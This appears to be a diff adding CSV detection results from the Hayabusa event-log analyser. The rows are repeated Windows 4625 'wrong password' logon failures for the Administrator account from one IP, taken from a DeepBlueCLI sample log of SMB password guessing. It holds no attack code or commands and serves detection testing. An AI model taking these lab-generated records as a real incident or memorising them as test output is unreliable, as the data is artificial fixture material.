+2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
